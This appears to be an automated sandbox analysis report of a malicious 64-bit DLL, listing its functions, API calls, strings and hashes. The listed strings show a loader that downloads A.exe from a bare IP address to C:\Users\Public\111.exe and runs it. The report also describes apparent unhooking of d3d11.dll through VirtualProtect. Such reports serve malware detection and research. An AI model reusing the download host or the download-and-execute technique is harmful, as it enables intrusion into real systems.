7045 7ff8b805baae GetCPInfo 7044->7045 7044->7046 7045->7040 7045->7046 7096 7ff8b805b478 7046->7096 7182 7ff8b805a1fc EnterCriticalSection 7048->7182 7065 7ff8b805aed0 7064->7065 7071 7ff8b805aecb 7064->7071 7066 7ff8b8059d48 BuildCatchObjectHelperInternal 47 API calls 7065->7066 7065->7071 7067 7ff8b805aeeb 7066->7067 7072 7ff8b805d0f4 7067->7072 7071->7026 7071->7027 7073 7ff8b805af0e 7072->7073 7074 7ff8b805d109 7072->7074 7076 7ff8b805d160 7073->7076 7074->7073 7080 7ff8b805d6a0 7074->7080 7077 7ff8b805d188 7076->7077 7078 7ff8b805d175 7076->7078 7077->7071 7078->7077 7093 7ff8b805b9e8 7078->7093 7081 7ff8b8059d48 BuildCatchObjectHelperInternal 47 API calls 7080->7081 7082 7ff8b805d6af 7081->7082 7084 7ff8b805d6fa 7082->7084 7092 7ff8b805a1fc EnterCriticalSection 7082->7092 7084->7073 7094 7ff8b8059d48 BuildCatchObjectHelperInternal 47 API calls 7093->7094 7095 7ff8b805b9f1 7094->7095 7097 7ff8b805b4b5 GetCPInfo 7096->7097 7098 7ff8b805b5ab 7096->7098 7097->7098 7103 7ff8b805b4c8 7097->7103 7099 7ff8b8052180 _log10_special 8 API calls 7098->7099 7101 7ff8b805b64a 7099->7101 7101->7040 7107 7ff8b805da2c 7103->7107 7108 7ff8b805aeac 47 API calls 7107->7108 7109 7ff8b805da6e 7108->7109 7127 7ff8b805bd74 7109->7127 7129 7ff8b805bd7d MultiByteToWideChar 7127->7129 7184 7ff8b8059ec0 BuildCatchObjectHelperInternal 11 API calls 7183->7184 7185 7ff8b805a361 Concurrency::details::SchedulerProxy::DeleteThis 7184->7185 7186 7ff8b8059ec0 BuildCatchObjectHelperInternal 11 API calls 7185->7186 7187 7ff8b805a383 7186->7187 7187->6736 7189 7ff8b805c08c 5 API calls 7188->7189 7190 7ff8b805c2c0 7189->7190 7190->6742 7192 7ff8b805af8f 7191->7192 7194 7ff8b805af74 7191->7194 7193 7ff8b805af94 7192->7193 7195 7ff8b805be04 WideCharToMultiByte 7192->7195 7193->7194 7197 7ff8b805a3e0 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7193->7197 7194->6736 7196 7ff8b805afeb 7195->7196 7196->7193 7198 7ff8b805aff2 GetLastError 7196->7198 7199 7ff8b805b01d 7196->7199 7197->7194 7200 7ff8b805a354 11 API calls 7198->7200 7201 7ff8b805be04 WideCharToMultiByte 7199->7201 7202 7ff8b805afff 7200->7202 7203 7ff8b805b044 7201->7203 7204 7ff8b805a3e0 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7202->7204 7203->7194 7203->7198 7204->7194 7206 7ff8b805bcc4 7205->7206 7207 7ff8b805aeac 47 API calls 7206->7207 7208 7ff8b805bce8 7207->7208 7208->6745 8624 7ff8b8061e65 8625 7ff8b8054620 _CallSETranslator 58 API calls 8624->8625 8626 7ff8b8061e73 8625->8626 8627 7ff8b8061e7e 8626->8627 8628 7ff8b8054620 _CallSETranslator 58 API calls 8626->8628 8628->8627 8826 7ff8b80568e4 8827 7ff8b8054620 _CallSETranslator 58 API calls 8826->8827 8828 7ff8b8056919 8827->8828 8829 7ff8b8054620 _CallSETranslator 58 API calls 8828->8829 8830 7ff8b8056927 __except_validate_context_record 8829->8830 8831 7ff8b8054620 _CallSETranslator 58 API calls 8830->8831 8832 7ff8b805696b 8831->8832 8833 7ff8b8054620 _CallSETranslator 58 API calls 8832->8833 8834 7ff8b8056974 8833->8834 8835 7ff8b8054620 _CallSETranslator 58 API calls 8834->8835 8836 7ff8b805697d 8835->8836 8837 7ff8b8053a70 _CreateFrameInfo 58 API calls 8836->8837 8838 7ff8b805698f 8837->8838 8839 7ff8b8054620 _CallSETranslator 58 API calls 8838->8839 8840 7ff8b80569ad __CxxCallCatchBlock 8838->8840 8839->8840 8841 7ff8b8053aac __CxxCallCatchBlock 58 API calls 8840->8841 8845 7ff8b8056a5e 8841->8845 8842 7ff8b8056a87 __CxxCallCatchBlock 8843 7ff8b8054620 _CallSETranslator 58 API calls 8842->8843 8844 7ff8b8056a9a 8843->8844 8846 7ff8b8054620 _CallSETranslator 58 API calls 8844->8846 8845->8842 8847 7ff8b8053d14 __CxxCallCatchBlock 58 API calls 8845->8847 8848 7ff8b8056aa3 8846->8848 8847->8842 8271 7ff8b80595e4 8274 7ff8b8059394 8271->8274 8281 7ff8b805935c 8274->8281 8279 7ff8b8059318 11 API calls 8280 7ff8b80593c7 8279->8280 8282 7ff8b805936c 8281->8282 8283 7ff8b8059371 8281->8283 8284 7ff8b8059318 11 API calls 8282->8284 8285 7ff8b8059378 8283->8285 8284->8283 8286 7ff8b805938d 8285->8286 8287 7ff8b8059388 8285->8287 8286->8279 8288 7ff8b8059318 11 API calls 8287->8288 8288->8286 8849 7ff8b805c4e4 8850 7ff8b805c51d 8849->8850 8851 7ff8b805c4ee 8849->8851 8851->8850 8852 7ff8b805c503 FreeLibrary 8851->8852 8852->8851 8629 7ff8b8051c60 8640 7ff8b8051a00 LoadLibraryA 8629->8640 8632 7ff8b80521d4 51 API calls 8633 7ff8b8051cac CreateProcessA 8632->8633 8634 7ff8b8051d64 WaitForSingleObject CloseHandle CloseHandle 8633->8634 8637 7ff8b8051d87 8633->8637 8634->8637 8635 7ff8b8051e10 Sleep CreateThread CloseHandle 8636 7ff8b8051e50 Sleep 8635->8636 8636->8636 8637->8635 8638 7ff8b8051e0a 8637->8638 8639 7ff8b80587ec _invalid_parameter_noinfo_noreturn 47 API calls 8637->8639 8638->8635 8639->8638 8641 7ff8b8051a34 6 API calls 8640->8641 8642 7ff8b8051b90 8640->8642 8643 7ff8b8051b85 FreeLibrary 8641->8643 8646 7ff8b8051ad9 8641->8646 8644 7ff8b8052180 _log10_special 8 API calls 8642->8644 8643->8642 8645 7ff8b8051bd0 8644->8645 8645->8632 8646->8643 8647 7ff8b8051b7e 8646->8647 8649 7ff8b8051bd9 8646->8649 8647->8643 8648 7ff8b8051c2c CloseHandle 8651 7ff8b8051c3a FreeLibrary 8648->8651 8649->8648 8650 7ff8b8051bfa WriteFile 8649->8650 8650->8649 8651->8642 8653 7ff8b8051060 8656 7ff8b8053e6c 8653->8656 8655 7ff8b8051082 8657 7ff8b8053e7b 8656->8657 8658 7ff8b8053e83 8656->8658 8659 7ff8b8058978 __std_exception_destroy 13 API calls 8657->8659 8658->8655 8659->8658 8856 7ff8b80528e0 InitializeSListHead 7438 7ff8b805cf60 7439 7ff8b805cf8a 7438->7439 7440 7ff8b805a400 BuildCatchObjectHelperInternal 11 API calls 7439->7440 7441 7ff8b805cfa9 7440->7441 7442 7ff8b805a26c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7441->7442 7443 7ff8b805cfb7 7442->7443 7444 7ff8b805a400 BuildCatchObjectHelperInternal 11 API calls 7443->7444 7448 7ff8b805cfe1 7443->7448 7445 7ff8b805cfd3 7444->7445 7447 7ff8b805a26c Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 7445->7447 7447->7448 7449 7ff8b805cfea 7448->7449 7450 7ff8b805c304 7448->7450 7451 7ff8b805c08c 5 API calls 7450->7451 7452 7ff8b805c33a 7451->7452 7453 7ff8b805c359 InitializeCriticalSectionAndSpinCount 7452->7453 7454 7ff8b805c33f 7452->7454 7453->7454 7454->7448

                                                                                                                              Executed Functions

                                                                                                                              Function 00007FF8B805BEE4 Relevance: 4.6, APIs: 3, Instructions: 78COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • GetEnvironmentStringsW.KERNELBASE(?,?,?,?,?,?,?,00007FF8B80591B7), ref: 00007FF8B805BEFD
                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF8B80591B7), ref: 00007FF8B805BF6F
                                                                                                                                • Part of subcall function 00007FF8B805A154: HeapAlloc.KERNEL32(?,?,FFFFFFFD,00007FF8B805B6C3), ref: 00007FF8B805A192
                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF8B80591B7), ref: 00007FF8B805BFCE
                                                                                                                                • Part of subcall function 00007FF8B805A26C: HeapFree.KERNEL32 ref: 00007FF8B805A282
                                                                                                                                • Part of subcall function 00007FF8B805A26C: GetLastError.KERNEL32 ref: 00007FF8B805A28C
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.4448714048.00007FF8B8051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8B8050000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.4448618311.00007FF8B8050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448890198.00007FF8B8063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448984658.00007FF8B806E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449098606.00007FF8B806F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449281562.00007FF8B80AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449338688.00007FF8B80B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ff8b8050000_loaddll64.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: EnvironmentFreeStrings$Heap$AllocErrorLast
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3331406755-0
                                                                                                                              • Opcode ID: 50fb26185be5a07987bcbe449ed6755d419da2e91f14583132998563139f8a72
                                                                                                                              • Instruction ID: ffb4116698c4412befb6fa0d7d623da46eac41788f566e1153d1762a7d4a7263
                                                                                                                              • Opcode Fuzzy Hash: 50fb26185be5a07987bcbe449ed6755d419da2e91f14583132998563139f8a72
                                                                                                                              • Instruction Fuzzy Hash: ED318131A1874685EE34AF2964910BA76A4BB44BD4F484235EB9E43BD5DF3CF4438718
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B805C640 Relevance: 3.1, APIs: 2, Instructions: 71COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.4448714048.00007FF8B8051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8B8050000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.4448618311.00007FF8B8050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448890198.00007FF8B8063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448984658.00007FF8B806E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449098606.00007FF8B806F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449281562.00007FF8B80AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449338688.00007FF8B80B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ff8b8050000_loaddll64.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FileHandleType
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3000768030-0
                                                                                                                              • Opcode ID: 3cb23623d06b6aa2fc516215eb9492eaad4616d15eed8bf0fe0773f05e6fc76f
                                                                                                                              • Instruction ID: 9e6d9770a6f9035664b95241d6394646a377f30fd4ce76c5bdfac07df2089754
                                                                                                                              • Opcode Fuzzy Hash: 3cb23623d06b6aa2fc516215eb9492eaad4616d15eed8bf0fe0773f05e6fc76f
                                                                                                                              • Instruction Fuzzy Hash: 43317E22A18A4681EF608B1995841B92650FB45BF4F68133ADB6E473E0CF38F5A3D354
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B80521D4 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.4448714048.00007FF8B8051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8B8050000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.4448618311.00007FF8B8050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448890198.00007FF8B8063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448984658.00007FF8B806E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449098606.00007FF8B806F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449281562.00007FF8B80AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449338688.00007FF8B80B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ff8b8050000_loaddll64.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1173176844-0
                                                                                                                              • Opcode ID: 21fdc86b4529e0685362b1fc80fda4a3d3eaf3a5468c8b3bb533dba23e2611be
                                                                                                                              • Instruction ID: 3606055a2cf0ce079dd11366868115b82491f706024f6380eb96f48b985be96c
                                                                                                                              • Opcode Fuzzy Hash: 21fdc86b4529e0685362b1fc80fda4a3d3eaf3a5468c8b3bb533dba23e2611be
                                                                                                                              • Instruction Fuzzy Hash: 54E02640E5A10749FD68616A19951F601444F697F0F181730DF3D452D7AF3CF597817D
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8052A94 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF8B8052AB6
                                                                                                                                • Part of subcall function 00007FF8B8054188: __vcrt_initialize_locks.LIBVCRUNTIME ref: 00007FF8B805418C
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.4448714048.00007FF8B8051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8B8050000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.4448618311.00007FF8B8050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448890198.00007FF8B8063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448984658.00007FF8B806E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449098606.00007FF8B806F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449281562.00007FF8B80AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449338688.00007FF8B80B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ff8b8050000_loaddll64.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __scrt_dllmain_crt_thread_attach__vcrt_initialize_locks
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 108617051-0
                                                                                                                              • Opcode ID: f37c9435776cf2516b32a5e67dbf35d0d08627450d4665d9c23b4861ef36544d
                                                                                                                              • Instruction ID: 8faae7ab5cbba57edc62a9b5d92bb105cb24ceffce86b8c16eadb4c2e0a1359e
                                                                                                                              • Opcode Fuzzy Hash: f37c9435776cf2516b32a5e67dbf35d0d08627450d4665d9c23b4861ef36544d
                                                                                                                              • Instruction Fuzzy Hash: E6E01A44E0D24356FE29266D24E61FA12401F263C1F040878EB5E521C38F3DB98BA63C
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Non-executed Functions

                                                                                                                              Function 00007FF8B8051A00 Relevance: 36.9, APIs: 11, Strings: 10, Instructions: 129libraryloaderfileCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.4448714048.00007FF8B8051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8B8050000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.4448618311.00007FF8B8050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448890198.00007FF8B8063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448984658.00007FF8B806E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449098606.00007FF8B806F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449281562.00007FF8B80AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449338688.00007FF8B80B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ff8b8050000_loaddll64.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressProc$Library$FreeHandle$CloseFileLoadModuleWrite
                                                                                                                              • String ID: C:\Users\Public\111.exe$CreateFileA$Download$InternetCloseHandle$InternetOpenA$InternetOpenUrlA$InternetReadFile$http://149.28.222.244:8000/A.exe$kernel32.dll$wininet.dll
                                                                                                                              • API String ID: 3146908461-3454270026
                                                                                                                              • Opcode ID: f7e129146121a8ea05f972dd1211a7dfb49a4aaa8a8643699a11141d5ee1ea86
                                                                                                                              • Instruction ID: 665658ff888f508ad925c94954a0338636874d1c57ffa33a6eedeeeeac74b4bc
                                                                                                                              • Opcode Fuzzy Hash: f7e129146121a8ea05f972dd1211a7dfb49a4aaa8a8643699a11141d5ee1ea86
                                                                                                                              • Instruction Fuzzy Hash: ED513865619A8281FE60DB19B9607AA63A4BF89BD4F440535CF4D03B94EF3CE50BCB18
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B80511D0 Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 259filememorysleepCOMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 168 7ff8b80511d0-7ff8b805125f call 7ff8b80521d4 171 7ff8b8051260-7ff8b8051267 168->171 171->171 172 7ff8b8051269-7ff8b805126d 171->172 173 7ff8b805128e-7ff8b805129e call 7ff8b8051ed0 172->173 174 7ff8b805126f-7ff8b805128c call 7ff8b8057d70 172->174 178 7ff8b80512a3-7ff8b8051367 GetModuleHandleA K32GetModuleInformation CreateFileA CreateFileMappingW MapViewOfFile 173->178 174->178 179 7ff8b805136d-7ff8b8051377 178->179 180 7ff8b8051411-7ff8b8051439 UnmapViewOfFile CloseHandle * 2 178->180 181 7ff8b8051380-7ff8b8051395 179->181 182 7ff8b8051469-7ff8b805149b call 7ff8b8052180 180->182 183 7ff8b805143b-7ff8b805144d 180->183 184 7ff8b80513a0-7ff8b80513ad 181->184 185 7ff8b805144f-7ff8b8051462 183->185 186 7ff8b8051464 call 7ff8b80521a0 183->186 189 7ff8b80513ff-7ff8b8051406 184->189 190 7ff8b80513af-7ff8b80513b3 184->190 185->186 191 7ff8b805149c-7ff8b8051524 call 7ff8b80587ec Sleep LoadLibraryA K32GetModuleInformation 185->191 186->182 189->181 195 7ff8b805140c 189->195 190->184 194 7ff8b80513b5-7ff8b80513f9 VirtualProtect call 7ff8b8057d70 VirtualProtect 190->194 198 7ff8b80515bf-7ff8b80515de call 7ff8b8052180 191->198 199 7ff8b805152a-7ff8b805153b 191->199 194->189 195->180 201 7ff8b8051540-7ff8b8051555 199->201 203 7ff8b8051560-7ff8b805156d 201->203 205 7ff8b80515ac-7ff8b80515b3 203->205 206 7ff8b805156f-7ff8b8051573 203->206 205->201 208 7ff8b80515b5-7ff8b80515ba 205->208 206->203 207 7ff8b8051575-7ff8b80515a6 VirtualProtect * 2 206->207 207->205 208->198
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.4448714048.00007FF8B8051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8B8050000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.4448618311.00007FF8B8050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448890198.00007FF8B8063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448984658.00007FF8B806E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449098606.00007FF8B806F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449281562.00007FF8B80AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449338688.00007FF8B80B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ff8b8050000_loaddll64.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FileProtectVirtual$HandleModule$CloseCreateInformationView$LibraryLoadMappingSleepUnmap_invalid_parameter_noinfo_noreturn
                                                                                                                              • String ID: .text$d3d11.dll$m32\
                                                                                                                              • API String ID: 1127392880-108044751
                                                                                                                              • Opcode ID: f8eac5884ecb68ecdefa7f178153e07893e7fb283b9ffc3f189104891a416684
                                                                                                                              • Instruction ID: 24b5d32c18cd0d6a52c25ca36d9bbd514de93db85fbd432eb779fa9c86518603
                                                                                                                              • Opcode Fuzzy Hash: f8eac5884ecb68ecdefa7f178153e07893e7fb283b9ffc3f189104891a416684
                                                                                                                              • Instruction Fuzzy Hash: 74B1C472A08A8186EB10DF29E4503AA77A0FB89BD4F514235DB9E037D4DF3CE586CB14
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8052C64 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.4448714048.00007FF8B8051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8B8050000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.4448618311.00007FF8B8050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448890198.00007FF8B8063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448984658.00007FF8B806E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449098606.00007FF8B806F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449281562.00007FF8B80AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449338688.00007FF8B80B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ff8b8050000_loaddll64.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3140674995-0
                                                                                                                              • Opcode ID: b902de9a0c728ab3d0539f7f08768528226bd412be49ac81a630cfcc5d2143e7
                                                                                                                              • Instruction ID: 94eafaee5ae403ce1517ed94a0d8e2f5e2f4f8ef4f7e47ab5d52300c2cbabdf8
                                                                                                                              • Opcode Fuzzy Hash: b902de9a0c728ab3d0539f7f08768528226bd412be49ac81a630cfcc5d2143e7
                                                                                                                              • Instruction Fuzzy Hash: 62312D72609B828AEB609F64E8903E97364FB84784F44443ADB4E47AD9DF38D54AC714
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8058500 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.4448714048.00007FF8B8051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8B8050000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.4448618311.00007FF8B8050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448890198.00007FF8B8063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448984658.00007FF8B806E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449098606.00007FF8B806F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449281562.00007FF8B80AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449338688.00007FF8B80B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ff8b8050000_loaddll64.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1239891234-0
                                                                                                                              • Opcode ID: 7cb486dcff7328d316b66a3582bf442a2702663513921f28948364b30a3c8cc3
                                                                                                                              • Instruction ID: 81d51c82bdf68522550f216029e199b511bba6d6a3f9148b50f28cf740d7325e
                                                                                                                              • Opcode Fuzzy Hash: 7cb486dcff7328d316b66a3582bf442a2702663513921f28948364b30a3c8cc3
                                                                                                                              • Instruction Fuzzy Hash: F6311D32618B8295EB60CB29E8902AA73A4FB947D4F500135EB9D43B95DF38D15BCB14
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B80515E0 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 219memorysleepCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.4448714048.00007FF8B8051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8B8050000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.4448618311.00007FF8B8050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448890198.00007FF8B8063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448984658.00007FF8B806E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449098606.00007FF8B806F000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449281562.00007FF8B80AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4449338688.00007FF8B80B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7ff8b8050000_loaddll64.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ProtectVirtual$InformationModuleSleep
                                                                                                                              • String ID: .text
                                                                                                                              • API String ID: 442984089-2719751843
                                                                                                                              • Opcode ID: e49de38fbfc609e34a30dce264c0388d0d19608f19f8e6381b3b9b8926308a32
                                                                                                                              • Instruction ID: 7dbaa5b7446886010ae19387fa7d0983e924899244a4dcc045bed50418ef224b
                                                                                                                              • Opcode Fuzzy Hash: e49de38fbfc609e34a30dce264c0388d0d19608f19f8e6381b3b9b8926308a32
                                                                                                                              • Instruction Fuzzy Hash: D6A1C232A24AC685EB11CF3DD4546B96BA0FB9ABC4F568321DB8D13791DF38E546C304
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8052834 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.4448714048.00007FF8B8051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF8B8050000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.4448618311.00007FF8B8050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448890198.00007FF8B8063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.4448984658.00007FF8B806E000.00000004.00000001.01000000.00000003.sdmpDownload File
